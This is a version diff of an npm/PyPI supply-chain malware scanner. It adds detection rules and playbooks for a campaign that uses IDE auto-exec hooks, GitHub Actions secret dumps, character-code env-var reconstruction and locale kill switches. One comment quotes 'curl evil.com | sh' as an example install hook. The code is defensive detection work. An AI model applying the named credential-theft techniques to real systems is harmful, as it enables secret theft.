muaddib-scanner 2.11.10 → 2.11.14

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.10",
+  "version": "2.11.14",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/monitor/classify.js

@@ -66,7 +66,14 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   'self_destruct_eval',                    // dynamic exec + unlink __filename (csec anti-forensics)
   // v2.10.94: MT-1 ceiling bypass for ltidi and csec under-threshold cases
   'external_tarball_dep',                  // dep URL = tarball on third-party host (ltidi chain)
-  'function_runtime_args'                  // new Function('require','__dirname','__filename',...) pattern (csec)
+  'function_runtime_args',                 // new Function('require','__dirname','__filename',...) pattern (csec)
+  // Mini Shai-Hulud campaign (2026-05): env var names reconstructed via
+  // String.fromCharCode() to evade static analysis. Structurally unique to malware —
+  // no legitimate code reconstructs env var names from character codes. Bypasses MT-1
+  // cap since the attack uses optionalDependencies + prepare hook (no direct lifecycle).
+  'env_charcode_reconstruction',           // fromCharCode + process.env[computed] (TeamPCP credential stealer)
+  'ide_hook_autoexec',                     // .claude/settings.json SessionStart hook, .vscode/tasks.json folderOpen (Shai-Hulud)
+  'workflow_secrets_dump'                  // toJSON(secrets) in GitHub Actions workflow (Shai-Hulud)
 ]);
 
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

package/src/output/formatter.js

@@ -157,18 +157,31 @@ function formatOutput(result, options, ctx) {
     if (deduped.length === 0) {
       console.log('[OK] No threats detected.\n');
     } else {
-      console.log(`[ALERT] ${deduped.length} threat(s) detected:\n`);
-      deduped.forEach((t, i) => {
-        const countStr = t.count > 1 ? ` (x${t.count})` : '';
-        console.log(`  ${i + 1}. [${t.severity}] ${t.type}${countStr}`);
-        console.log(`     ${t.message}`);
-        console.log(`     File: ${t.file}`);
-        const playbook = getPlaybook(t.type);
-        if (playbook) {
-          console.log(`     \u2192 ${playbook}`);
+      // v2.11.11: Filter degraded LOW quick-scan signals from default output.
+      // These are regex-only detections in overflow files (no AST context) and
+      // clutter the output on monorepos. Show with --verbose. Scoring, JSON,
+      // SARIF, and HTML output are unaffected — this is display-only.
+      const hiddenCount = options.verbose ? 0 : deduped.filter(t => t.degraded && t.severity === 'LOW').length;
+      const displayThreats = options.verbose ? deduped : deduped.filter(t => !(t.degraded && t.severity === 'LOW'));
+      if (displayThreats.length === 0 && hiddenCount > 0) {
+        console.log(`[OK] No high-confidence threats detected (${hiddenCount} low-confidence signal(s) hidden, use --verbose to show).\n`);
+      } else {
+        console.log(`[ALERT] ${displayThreats.length} threat(s) detected:\n`);
+        displayThreats.forEach((t, i) => {
+          const countStr = t.count > 1 ? ` (x${t.count})` : '';
+          console.log(`  ${i + 1}. [${t.severity}] ${t.type}${countStr}`);
+          console.log(`     ${t.message}`);
+          console.log(`     File: ${t.file}`);
+          const playbook = getPlaybook(t.type);
+          if (playbook) {
+            console.log(`     \u2192 ${playbook}`);
+          }
+          console.log('');
+        });
+        if (hiddenCount > 0) {
+          console.log(`  + ${hiddenCount} low-confidence signal(s) hidden (use --verbose to show)\n`);
         }
-        console.log('');
-      });
+      }
     }
 
     // Sandbox section (normal)

package/src/pipeline/executor.js

@@ -256,17 +256,26 @@ async function execute(targetPath, options, pythonDeps, warnings) {
       { re: /\bprocess\.mainModule\b/, type: 'dynamic_require', severity: 'MEDIUM', label: 'process.mainModule' },
       { re: /\bModule\._load\b/, type: 'module_load_bypass', severity: 'CRITICAL', label: 'Module._load' }
     ];
+    // v2.11.11: Tooling path detection for quick-scan. Files in standard monorepo
+    // tooling directories (scripts/, test/, examples/, .github/, compiler/) carry
+    // much lower signal than root/src files — build/CI/test scripts legitimately
+    // use child_process. Downgrade non-CRITICAL findings to LOW in these paths.
+    // Module._load remains CRITICAL — it is never legitimate in tooling scripts.
+    const TOOLING_PATH_RE = /(?:^|[/\\])(?:scripts|test|tests|__tests__|spec|examples|fixtures|compiler[/\\]scripts|\.github)[/\\]/i;
     for (const filePath of overflowFiles) {
       try {
         const stat = fs.statSync(filePath);
         if (stat.size > getMaxFileSize()) continue;
         const content = fs.readFileSync(filePath, 'utf8');
         const relFile = path.relative(targetPath, filePath);
+        const isToolingPath = TOOLING_PATH_RE.test(relFile);
         for (const pat of QUICK_SCAN_PATTERNS) {
           if (pat.re.test(content)) {
+            // Downgrade non-CRITICAL findings in tooling paths to LOW
+            const severity = (isToolingPath && pat.severity !== 'CRITICAL') ? 'LOW' : pat.severity;
             quickScanThreats.push({
               type: pat.type,
-              severity: pat.severity,
+              severity,
               message: `[quick-scan] ${pat.label} detected in overflow file.`,
               file: relFile,
               degraded: true,  // P3: regex-only detection, no semantic context

package/src/pipeline/processor.js

@@ -321,7 +321,7 @@ async function process(threats, targetPath, options, pythonDeps, warnings, scann
   // Compound scoring: inject synthetic CRITICAL threats when co-occurring types
   // indicate unambiguous malice. Applied AFTER FP reductions to recover signals
   // that were individually downgraded (count-based, dist, reachability, delta).
-  applyCompoundBoosts(deduped);
+  applyCompoundBoosts(deduped, targetPath);
 
   // Intent coherence analysis: detect source→sink pairs within files
   // Pass targetPath for destination-aware SDK pattern detection

package/src/response/playbooks.js

@@ -224,6 +224,11 @@ const PLAYBOOKS = {
   workflow_pwn_request:
     'CRITIQUE: Pwn request detecte — pull_request_target avec checkout du head de la PR permet l\'execution de code arbitraire. Remplacer par pull_request ou utiliser une strategie de checkout securisee (base ref uniquement).',
 
+  workflow_secrets_dump:
+    'CRITIQUE: Workflow GitHub Actions utilise toJSON(secrets) pour dumper tous les secrets du repository. ' +
+    'Technique Shai-Hulud (TeamPCP). Supprimer le workflow immediatement. ' +
+    'Si le workflow a ete execute, considerer tous les secrets du repository compromis et les regenerer.',
+
   sandbox_sensitive_file_read:
     'CRITIQUE: Package lit des fichiers sensibles (credentials) lors de l\'installation. Ne pas installer. Supprimer immediatement.',
   sandbox_sensitive_file_write:
@@ -374,6 +379,13 @@ const PLAYBOOKS = {
     'NE PAS ouvrir ce projet avec un agent IA. Supprimer les fichiers de config compromis. ' +
     'Si deja ouvert avec un agent IA, considerer la machine compromise. Regenerer tous les secrets.',
 
+  ide_hook_autoexec:
+    'CRITIQUE: Fichier de configuration IDE avec hooks d\'auto-execution detecte. ' +
+    'NE PAS ouvrir ce projet dans un IDE ou agent IA. Le fichier execute du code ' +
+    'automatiquement a l\'ouverture du projet (SessionStart, folderOpen). ' +
+    'Technique Shai-Hulud (TeamPCP). Supprimer les fichiers .claude/settings.json ' +
+    'et .vscode/tasks.json avant ouverture.',
+
   ai_agent_abuse:
     'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
     '(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +
@@ -728,6 +740,11 @@ const PLAYBOOKS = {
     'Pattern kamikaze.sh du wiper CanisterWorm ciblant les systemes Iran (Asia/Tehran). ' +
     'NE PAS executer. Isoler immediatement. Signaler comme destructware.',
 
+  geo_evasion_killswitch:
+    'Code verifie la locale systeme pour "ru" et fait process.exit — technique CIS kill switch ' +
+    'classique de malware (TeamPCP, Lazarus) pour eviter de cibler les systemes russophones. ' +
+    'Signal fort en combinaison avec d\'autres indicateurs. Analyser le code complet du package.',
+
   proc_mem_scan:
     'CRITIQUE: Acces a /proc/*/mem — extraction de secrets depuis la memoire des processus. ' +
     'Technique TeamPCP credential stealer dans Trivy v0.69.4. ' +

package/src/rules/confidence-tiers.js

@@ -100,7 +100,9 @@ const HIGH_TIER_EXTRA = new Set([
   'anti_forensic_xor_autodelete',
   'detached_credential_exfil',
   // Workflow injection
-  'workflow_write'
+  'workflow_write',
+  // Geo-evasion (locale check + country code + exit = compound evidence)
+  'geo_evasion_killswitch'
 ]);
 
 // Heuristic / count-based / weak-signal types. Always low tier regardless

package/src/rules/index.js

@@ -705,6 +705,18 @@ const RULES = {
     ],
     mitre: 'T1059'
   },
+  ide_hook_autoexec: {
+    id: 'MUADDIB-AICONF-003',
+    name: 'IDE Hook Auto-Execution',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Fichier de configuration IDE (.claude/settings.json, .vscode/tasks.json, .kiro/settings/mcp.json) contient des hooks qui executent du code automatiquement a l\'ouverture du projet. Technique Shai-Hulud (TeamPCP, mai 2026).',
+    references: [
+      'https://github.com/g00dfe11ow/Shai-Hulud-Open-Source',
+      'https://www.wiz.io/blog/mini-shai-hulud-supply-chain-sap-npm'
+    ],
+    mitre: 'T1546'
+  },
 
   require_cache_poison: {
     id: 'MUADDIB-AST-019',
@@ -975,6 +987,18 @@ const RULES = {
     ],
     mitre: 'T1195.002'
   },
+  workflow_secrets_dump: {
+    id: 'MUADDIB-GHA-004',
+    name: 'GitHub Actions Secrets Dump',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Workflow utilise toJSON(secrets) pour exfiltrer tous les secrets du repository. Technique Shai-Hulud (TeamPCP, mai 2026).',
+    references: [
+      'https://github.com/g00dfe11ow/Shai-Hulud-Open-Source',
+      'https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions'
+    ],
+    mitre: 'T1552.001'
+  },
 
   // Sandbox detections
   sandbox_sensitive_file_read: {
@@ -2458,6 +2482,18 @@ const RULES = {
     ],
     mitre: 'T1059.007'
   },
+  geo_evasion_killswitch: {
+    id: 'MUADDIB-AST-091',
+    name: 'Geo-Evasion CIS Kill Switch',
+    severity: 'HIGH',
+    confidence: 'medium',
+    description: 'Code verifie la locale systeme (Intl.DateTimeFormat, LC_ALL/LANG) pour "ru" et fait process.exit — technique CIS kill switch pour eviter de cibler les pays de l\'operateur. Pattern TeamPCP/Shai-Hulud.',
+    references: [
+      'https://github.com/g00dfe11ow/Shai-Hulud-Open-Source',
+      'https://attack.mitre.org/techniques/T1614/'
+    ],
+    mitre: 'T1614'
+  },
   external_tarball_dep: {
     id: 'MUADDIB-PKG-020',
     name: 'External Tarball Dependency URL',

package/src/scanner/ai-config.js

@@ -19,7 +19,7 @@
 const fs = require('fs');
 const path = require('path');
 
-// AI agent config files to scan (relative to project root)
+// AI agent config files to scan for prompt injection (relative to project root)
 const AI_CONFIG_FILES = [
   '.cursorrules',
   '.cursorignore',
@@ -31,6 +31,17 @@ const AI_CONFIG_FILES = [
   '.github/copilot-setup-steps.yml'
 ];
 
+// IDE/agent config files to scan for auto-exec hooks (JSON, relative to project root)
+// These are distinct from AI_CONFIG_FILES: they contain machine-readable hooks
+// that execute code on project open, not human-readable prompt injection.
+// Technique: Shai-Hulud (TeamPCP, May 2026) — .claude/settings.json SessionStart hook.
+const IDE_HOOK_FILES = [
+  '.claude/settings.json',
+  '.claude/settings.local.json',
+  '.vscode/tasks.json',
+  '.kiro/settings/mcp.json'
+];
+
 // Dangerous shell command patterns in AI config files
 const SHELL_COMMAND_PATTERNS = [
   // Download and execute
@@ -104,6 +115,105 @@ function scanAIConfig(targetPath) {
     threats.push(...fileThreats);
   }
 
+  // Scan IDE hook files for auto-exec patterns (separate from prompt injection)
+  for (const hookFile of IDE_HOOK_FILES) {
+    const filePath = path.join(targetPath, hookFile);
+    if (!fs.existsSync(filePath)) continue;
+
+    let content;
+    try {
+      const stat = fs.statSync(filePath);
+      if (stat.size > 1024 * 1024) continue;
+      content = fs.readFileSync(filePath, 'utf8');
+    } catch {
+      continue;
+    }
+
+    const hookThreats = analyzeIDEHookFile(content, hookFile);
+    threats.push(...hookThreats);
+  }
+
+  return threats;
+}
+
+/**
+ * Analyze an IDE/agent config JSON file for auto-exec hooks.
+ *
+ * Distinct from prompt injection: these files contain machine-readable
+ * hooks that execute arbitrary commands when the project is opened.
+ * No legitimate npm package should ship these files with hooks.
+ */
+function analyzeIDEHookFile(content, relPath) {
+  const threats = [];
+
+  let parsed;
+  try {
+    parsed = JSON.parse(content);
+  } catch {
+    return threats; // invalid JSON — skip silently
+  }
+
+  if (!parsed || typeof parsed !== 'object') return threats;
+
+  // .claude/settings.json / .claude/settings.local.json
+  // Structure: { hooks: { EventName: [{ matcher, hooks: [{ type, command }] }] } }
+  if (relPath.includes('.claude/') && relPath.endsWith('settings.json')) {
+    const hooks = parsed.hooks;
+    if (hooks && typeof hooks === 'object') {
+      for (const [event, matchers] of Object.entries(hooks)) {
+        if (!Array.isArray(matchers)) continue;
+        for (const matcher of matchers) {
+          if (!matcher || !Array.isArray(matcher.hooks)) continue;
+          for (const hook of matcher.hooks) {
+            if (hook && hook.command) {
+              threats.push({
+                type: 'ide_hook_autoexec',
+                severity: 'CRITICAL',
+                message: `IDE auto-exec hook: .claude/settings.json ${event} event executes "${hook.command}" — Shai-Hulud (TeamPCP) pattern`,
+                file: relPath
+              });
+            }
+          }
+        }
+      }
+    }
+  }
+
+  // .vscode/tasks.json
+  // Structure: { tasks: [{ label, command, runOptions: { runOn: "folderOpen" } }] }
+  if (relPath.includes('.vscode/') && relPath.endsWith('tasks.json')) {
+    const tasks = Array.isArray(parsed.tasks) ? parsed.tasks : [];
+    for (const task of tasks) {
+      if (task && task.runOptions && task.runOptions.runOn === 'folderOpen') {
+        const cmd = task.command || task.label || 'unknown';
+        threats.push({
+          type: 'ide_hook_autoexec',
+          severity: 'CRITICAL',
+          message: `IDE auto-exec hook: .vscode/tasks.json task "${cmd}" runs on folder open — Shai-Hulud (TeamPCP) pattern`,
+          file: relPath
+        });
+      }
+    }
+  }
+
+  // .kiro/settings/mcp.json
+  // Structure: { mcpServers: { name: { command, args } } }
+  if (relPath.includes('.kiro/') && relPath.endsWith('mcp.json')) {
+    const mcpServers = parsed.mcpServers;
+    if (mcpServers && typeof mcpServers === 'object') {
+      for (const [name, config] of Object.entries(mcpServers)) {
+        if (config && typeof config === 'object' && config.command) {
+          threats.push({
+            type: 'ide_hook_autoexec',
+            severity: 'CRITICAL',
+            message: `IDE auto-exec hook: .kiro/settings/mcp.json server "${name}" executes "${config.command}" on project open`,
+            file: relPath
+          });
+        }
+      }
+    }
+  }
+
   return threats;
 }
 

package/src/scanner/ast.js

@@ -345,6 +345,23 @@ function analyzeFile(content, filePath, basePath) {
     });
   }
 
+  // Geo-evasion CIS kill switch: locale check for "ru" + process.exit
+  // Pattern: TeamPCP/Shai-Hulud isSystemRussian() — checks Intl.DateTimeFormat
+  // locale or LC_ALL/LANG env vars for Russian locale, then process.exit(0).
+  // Triple-gate: (1) locale API or env var check, (2) "ru" string comparison,
+  // (3) process.exit in same file. No legitimate npm package does this.
+  const hasLocaleCheck = /resolvedOptions\s*\(\s*\)\s*\.locale/.test(content) ||
+                         (/\bLC_ALL\b/.test(content) && /\bLANG\b/.test(content));
+  const hasRuCheck = /['"`]ru['"`]/.test(content) && /startsWith|===|==/.test(content);
+  if (hasLocaleCheck && hasRuCheck && /process\.exit/.test(content)) {
+    threats.push({
+      type: 'geo_evasion_killswitch',
+      severity: 'HIGH',
+      message: 'Geo-evasion CIS kill switch: locale check for "ru" + process.exit — malware avoids targeting operator\'s country (TeamPCP pattern)',
+      file: ctx.relPath
+    });
+  }
+
   handlePostWalk(ctx);
 
   return threats;

package/src/scanner/dataflow.js

@@ -458,7 +458,11 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
-      if (callName === 'request' || callName === 'fetch' || callName === 'post' || callName === 'get') {
+      // v2.11.11: Removed bare 'get' — getCallName() returns just the method name
+      // for member expressions (Map.get(), cache.get() → 'get'), causing massive FP
+      // on any file that calls .get(). Qualified http.get/https.get are already
+      // caught by MODULE_SINK_METHODS (lines 33-34) via taint-tracked module analysis.
+      if (callName === 'request' || callName === 'fetch' || callName === 'post') {
         sinks.push({
           type: 'network_send',
           name: callName,

package/src/scanner/github-actions.js

@@ -102,6 +102,18 @@ function scanDirRecursive(dirPath, targetPath, threats, depth = 0) {
           file: relFile
         });
       }
+
+      // GHA-004: Secrets dump via toJSON(secrets) — exfiltrates ALL repository secrets
+      // Technique: Shai-Hulud (TeamPCP, May 2026) — workflow dumps toJSON(secrets) to a
+      // file and uploads it as an artifact. No legitimate workflow uses toJSON(secrets).
+      if (/toJSON\s*\(\s*secrets\s*\)/.test(activeContent)) {
+        threats.push({
+          type: 'workflow_secrets_dump',
+          severity: 'CRITICAL',
+          message: 'GitHub Actions secrets dump: toJSON(secrets) exfiltrates all repository secrets',
+          file: relFile
+        });
+      }
     }
 }
 

package/src/scanner/obfuscation.js

@@ -64,9 +64,15 @@ function detectObfuscation(targetPath) {
     const pathParts = relativePath.split(path.sep);
     const isInDistOrBuild = pathParts.some(p => p === 'dist' || p === 'build');
     const isLargeCjsMjs = (basename.endsWith('.cjs') || basename.endsWith('.mjs')) && content.length > 100 * 1024;
-    // P6: Any JS file > 100KB is overwhelmingly bundled output regardless of directory name.
-    // Real obfuscated malware is typically small (<50KB). Catches prettier plugins/, svelte compiler/, etc.
-    const isLargeJs = basename.endsWith('.js') && content.length > 100 * 1024;
+    // P6: Any JS file > 100KB is overwhelmingly bundled output regardless of directory name,
+    // UNLESS it contains javascript-obfuscator markers (_0x hex variables). Bundlers
+    // (webpack/rollup/esbuild) never produce _0x vars — this is a discriminant unique to
+    // javascript-obfuscator, which is only used to hide malicious intent.
+    // Mini Shai-Hulud campaign (2026-05): 2.3MB payload exploited the original blanket
+    // exemption to evade detection on @tanstack/react-router (12M weekly downloads).
+    const isLargeJsCandidate = basename.endsWith('.js') && content.length > 100 * 1024;
+    const hasObfuscatorMarkers = isLargeJsCandidate && /\b_0x[a-f0-9]{4,}\b/.test(content.slice(0, 8192));
+    const isLargeJs = isLargeJsCandidate && !hasObfuscatorMarkers;
     // Locale/i18n files legitimately contain invisible Unicode (e.g. Persian ZWNJ U+200C)
     const isLocaleFile = /(?:^|[/\\])(?:locale|locales|i18n|intl|lang|languages|translations)[/\\]/i.test(relativePath);
     const isPackageOutput = isMinified || isBundled || isInDistOrBuild || isLargeCjsMjs || isLargeJs || isLocaleFile;

package/src/scanner/package.js

@@ -370,7 +370,11 @@ async function scanPackageJson(targetPath) {
       });
     }
     // Detect git-based dependencies — potential PackageGate RCE vector
-    if (typeof depVersion === 'string' && /^git[+:]/.test(depVersion)) {
+    // Covers git+https://, git://, and platform shorthands (github:, gitlab:, bitbucket:)
+    // which resolve to git repos and execute lifecycle hooks (prepare) on install.
+    // Mini Shai-Hulud campaign (2026-05): github:tanstack/router#commit exploited the
+    // prepare hook to execute tanstack_runner.js.
+    if (typeof depVersion === 'string' && /^(?:git[+:]|github:|gitlab:|bitbucket:)/.test(depVersion)) {
       threats.push({
         type: 'git_dependency_rce',
         severity: 'HIGH',

package/src/scoring.js

@@ -457,7 +457,13 @@ const REACHABILITY_EXEMPT_TYPES = new Set([
   'function_constructor_require',  // AST-086 — Function.constructor("require", body)
   'process_variable_shadow',       // AST-087 — const process = {env:{...}}
   'function_runtime_args',         // AST-090 — new Function('require','__dirname',...)
-  'self_destruct_eval'             // AST-089 — dynamic exec + unlink __filename
+  'self_destruct_eval',            // AST-089 — dynamic exec + unlink __filename
+  // Mini Shai-Hulud campaign (2026-05): env var names reconstructed via
+  // String.fromCharCode() to evade static analysis. Structurally unique to malware —
+  // no legitimate code reconstructs env var names from character codes. Injected files
+  // (router_init.js) are unreachable via require/import but execute via lifecycle hooks
+  // or optionalDependencies with prepare scripts.
+  'env_charcode_reconstruction'    // AST-018 — fromCharCode + process.env[computed]
 ]);
 
 // ============================================
@@ -515,17 +521,27 @@ const SCORING_COMPOUNDS = [
     // C7 : when every component lives only in dist/build/out, the cooccurrence
     // is bundler aggregation (a postinstall mention + a pre-bundled HTTP client
     // with credential fields), not real exfiltration. Skip the compound.
-    excludeIfBundled: true
+    excludeIfBundled: true,
+    // v2.11.11: Scope to lifecycle target file + 1-level imports. On monorepos
+    // (React, Next.js) the unscoped co-occurrence of lifecycle_script + any
+    // suspicious_dataflow anywhere in the repo is noise. The compound should
+    // only fire when the dataflow signal is in the file directly executed by
+    // the lifecycle script or in its static imports.
+    lifecycleScoped: true
   },
   {
     type: 'lifecycle_dangerous_exec',
     requires: ['lifecycle_script', 'dangerous_exec'],
     severity: 'CRITICAL',
     message: 'Lifecycle hook + dangerous shell execution — install-time command injection (scoring compound).',
-    fileFrom: 'dangerous_exec'
+    fileFrom: 'dangerous_exec',
     // No sameFile: lifecycle is package-level
     // dangerous_exec is in DIST_EXEMPT_TYPES so it is never coincidental in
     // dist/ ; no excludeIfBundled gate added here.
+    // v2.11.11: Scope to lifecycle target file + 1-level imports. Without this,
+    // a monorepo postinstall referencing a clean setup script correlates with
+    // exec() in unrelated release/CI scripts → CRITICAL false positive.
+    lifecycleScoped: true
   },
   {
     type: 'obfuscated_lifecycle_env',
@@ -595,13 +611,117 @@ const SCORING_COMPOUNDS = [
   },
 ];
 
+// v2.11.11: Extract static require/import targets from a JS file (1 level).
+// Returns a Set of relative file paths (normalized with forward slashes).
+const _acorn = require('acorn');
+const _acornWalk = require('acorn-walk');
+
+function _extractStaticImports(filePath) {
+  const imports = new Set();
+  try {
+    const content = require('fs').readFileSync(filePath, 'utf8');
+    const ast = _acorn.parse(content, { sourceType: 'module', ecmaVersion: 'latest', allowReturnOutsideFunction: true, allowImportExportEverywhere: true });
+    _acornWalk.simple(ast, {
+      CallExpression(node) {
+        if (node.callee.type === 'Identifier' && node.callee.name === 'require' &&
+            node.arguments.length > 0 && node.arguments[0].type === 'Literal' &&
+            typeof node.arguments[0].value === 'string') {
+          const target = node.arguments[0].value;
+          if (target.startsWith('.')) imports.add(target);
+        }
+      },
+      ImportDeclaration(node) {
+        if (node.source && typeof node.source.value === 'string' && node.source.value.startsWith('.')) {
+          imports.add(node.source.value);
+        }
+      }
+    });
+  } catch { /* parse failure — return empty set */ }
+  return imports;
+}
+
+// v2.11.11: Lifecycle scope resolution. Determines if a lifecycleScoped compound
+// should fire based on whether the non-lifecycle threats are in the lifecycle
+// target file or its direct static imports.
+// Returns: 'pass' (compound should fire), 'skip' (no match in scope), 'unscoped' (can't resolve target)
+const _NODE_FILE_RE = /\bnode\s+(?:\.\/)?([^\s"';&|]+\.(?:js|mjs|cjs))\b/;
+
+function _resolveLifecycleScopeGate(compound, threats, targetPath) {
+  const fs = require('fs');
+  const pathMod = require('path');
+
+  // 1. Extract lifecycle target files from lifecycle_script threats + package.json
+  const lifecycleTargetFiles = new Set();
+  const lifecycleThreats = threats.filter(t => t.type === 'lifecycle_script');
+  for (const lt of lifecycleThreats) {
+    const match = lt.message && _NODE_FILE_RE.exec(lt.message);
+    if (match) lifecycleTargetFiles.add(match[1]);
+  }
+
+  // Also read package.json directly for robustness
+  try {
+    const pkgPath = pathMod.join(targetPath, 'package.json');
+    if (fs.existsSync(pkgPath)) {
+      const pkgData = JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+      const scripts = pkgData.scripts || {};
+      const LIFECYCLE_NAMES = ['preinstall', 'install', 'postinstall', 'preuninstall', 'postuninstall', 'prepare'];
+      for (const name of LIFECYCLE_NAMES) {
+        if (scripts[name]) {
+          const m = _NODE_FILE_RE.exec(scripts[name]);
+          if (m) lifecycleTargetFiles.add(m[1]);
+        }
+      }
+    }
+  } catch { /* ignore */ }
+
+  // 2. If no target file extractable, return 'unscoped'
+  if (lifecycleTargetFiles.size === 0) return 'unscoped';
+
+  // 3. Build the scoped file set: target files + their 1-level static imports
+  const scopedFiles = new Set();
+  for (const relTarget of lifecycleTargetFiles) {
+    const normalized = relTarget.replace(/\\/g, '/');
+    scopedFiles.add(normalized);
+    // Parse the target file and extract its static imports
+    const absTarget = pathMod.resolve(targetPath, relTarget);
+    const imports = _extractStaticImports(absTarget);
+    for (const imp of imports) {
+      // Resolve relative import against the target file's directory
+      const impDir = pathMod.dirname(absTarget);
+      let resolved = pathMod.relative(targetPath, pathMod.resolve(impDir, imp)).replace(/\\/g, '/');
+      // Try with .js extension if not present
+      if (!resolved.match(/\.(js|mjs|cjs)$/)) {
+        if (fs.existsSync(pathMod.resolve(targetPath, resolved + '.js'))) {
+          resolved += '.js';
+        } else if (fs.existsSync(pathMod.resolve(targetPath, resolved, 'index.js'))) {
+          resolved = resolved + '/index.js';
+        }
+      }
+      scopedFiles.add(resolved);
+    }
+  }
+
+  // 4. Check if any non-lifecycle required type has a threat in the scoped file set
+  const nonLifecycleReqs = compound.requires.filter(r => r !== 'lifecycle_script');
+  for (const req of nonLifecycleReqs) {
+    const reqThreats = threats.filter(t => t.type === req && t.file);
+    for (const t of reqThreats) {
+      const normalizedFile = t.file.replace(/\\/g, '/');
+      if (scopedFiles.has(normalizedFile)) return 'pass';
+    }
+  }
+
+  return 'skip';
+}
+
 /**
  * Apply compound boost rules: inject synthetic CRITICAL threats when
  * co-occurring threat types indicate unambiguous malice.
  * Called AFTER applyFPReductions to recover individually-downgraded signals.
  * @param {Array} threats - deduplicated threat array (mutated in place)
+ * @param {string} [targetPath] - scan target directory (for lifecycle scope resolution)
  */
-function applyCompoundBoosts(threats) {
+function applyCompoundBoosts(threats, targetPath) {
   const typeSet = new Set(threats.map(t => t.type));
 
   // Build map of type → first file encountered (for file assignment)
@@ -661,6 +781,36 @@ function applyCompoundBoosts(threats) {
       if (anyFileBearing && allComponentsBundled) continue;
     }
 
+    // v2.11.11: Lifecycle scope gate. For compounds with lifecycleScoped: true,
+    // the non-lifecycle required type must have at least one threat in the file
+    // directly executed by the lifecycle script OR in its static imports (1 level).
+    // On monorepos, unscoped co-occurrence (lifecycle in package.json + exec in
+    // scripts/release/publish.js) is noise. Fallback: when no target file can be
+    // extracted (e.g. "npm run build"), the compound fires with severity capped
+    // at HIGH and tagged unscopedCompound so the floor-50 logic skips it.
+    if (compound.lifecycleScoped && targetPath) {
+      const scopeResult = _resolveLifecycleScopeGate(compound, threats, targetPath);
+      if (scopeResult === 'skip') continue;
+      if (scopeResult === 'unscoped') {
+        // Can't extract target file — fire but cap severity and tag
+        if (!compoundAlreadyPresent) {
+          const cappedSeverity = compound.severity === 'CRITICAL' ? 'HIGH' : compound.severity;
+          threats.push({
+            type: compound.type,
+            severity: cappedSeverity,
+            message: compound.message + ' (unscoped — lifecycle target not resolvable)',
+            file: typeFileMap[compound.fileFrom] || '(unknown)',
+            count: 1,
+            compound: true,
+            unscopedCompound: true
+          });
+          typeSet.add(compound.type);
+        }
+        continue; // skip the normal push below — already handled
+      }
+      // scopeResult === 'pass' — compound fires normally
+    }
+
     // Same-file constraint: required types must appear in at least one common file.
     // sameFile: true = ALL required types must share a file.
     // sameFileTypes: [...] = only specified types must share a file.
@@ -736,6 +886,16 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
     typeCounts[t.type] = (typeCounts[t.type] || 0) + 1;
   }
 
+  // Mini Shai-Hulud (2026-05): pre-compute files that contain reachability-exempt
+  // findings. Co-occurring threats in these files are also exempt from the
+  // unreachable downgrade — the exempt finding proves structural malice.
+  const _filesWithExemptThreats = new Set();
+  for (const t of threats) {
+    if (t.file && REACHABILITY_EXEMPT_TYPES.has(t.type)) {
+      _filesWithExemptThreats.add(t.file.replace(/\\/g, '/'));
+    }
+  }
+
   const totalThreats = threats.length;
 
   // P4: Plugin loader pattern — packages with 5+ dynamic_require + dynamic_import combined
@@ -954,12 +1114,18 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
     // Reachability: findings in files not reachable from entry points → LOW
     // Exception: .d.ts files are never require()'d by JS but are executed by ts-node/tsx/bun.
     // Executable code in .d.ts is always malicious — exempt from unreachable downgrade.
+    // Exception 2 (Mini Shai-Hulud, 2026-05): if the same file contains at least one
+    // reachability-exempt finding (env_charcode_reconstruction, function_constructor_require,
+    // etc.), all other findings in that file are also exempt. Rationale: the exempt
+    // finding proves the file contains structurally malicious code, so co-occurring
+    // signals (obfuscation, dataflow, credential harvest) are scoring-relevant regardless
+    // of whether the file is reachable via require/import.
     const isDtsFile = t.file && t.file.endsWith('.d.ts');
     if (reachableFiles && reachableFiles.size > 0 && t.file &&
         !REACHABILITY_EXEMPT_TYPES.has(t.type) &&
         !isPackageLevelThreat(t) && !isDtsFile) {
       const normalizedFile = t.file.replace(/\\/g, '/');
-      if (!reachableFiles.has(normalizedFile)) {
+      if (!reachableFiles.has(normalizedFile) && !_filesWithExemptThreats.has(normalizedFile)) {
         t.reductions.push({ rule: 'unreachable', from: t.severity, to: 'LOW' });
         t.severity = 'LOW';
         t.unreachable = true;
@@ -1139,7 +1305,9 @@ function calculateRiskScore(deduped, intentResult) {
   let packageScore = computeGroupScore(packageLevelThreats);
   // Floor: CRITICAL package-level threats (lifecycle_shell_pipe, IOC match) → minimum HIGH (50)
   // A single "curl evil.com | sh" in preinstall = 25 points = MEDIUM without floor.
-  if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
+  // v2.11.11: unscopedCompound threats (lifecycle target not resolvable) are excluded from
+  // the floor — they represent uncertain correlations that should not inflate the score.
+  if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL' && !t.unscopedCompound)) {
     packageScore = Math.max(packageScore, 50);
   }
   // v2.10.94: Co-occurrence floor — 2+ distinct CRITICAL package-level types (different
@@ -1147,7 +1315,7 @@ function calculateRiskScore(deduped, intentResult) {
   // (CRITICAL tier) so the final risk level reflects real severity instead of stopping
   // at HIGH. Catches apache-arrow-14 (curl_env_exfil + lifecycle_env_exfil compound).
   const criticalPkgTypes = new Set(
-    packageLevelThreats.filter(t => t.severity === 'CRITICAL').map(t => t.type)
+    packageLevelThreats.filter(t => t.severity === 'CRITICAL' && !t.unscopedCompound).map(t => t.type)
   );
   if (criticalPkgTypes.size >= 2) {
     packageScore = Math.max(packageScore, 75);
@@ -1176,7 +1344,7 @@ function calculateRiskScore(deduped, intentResult) {
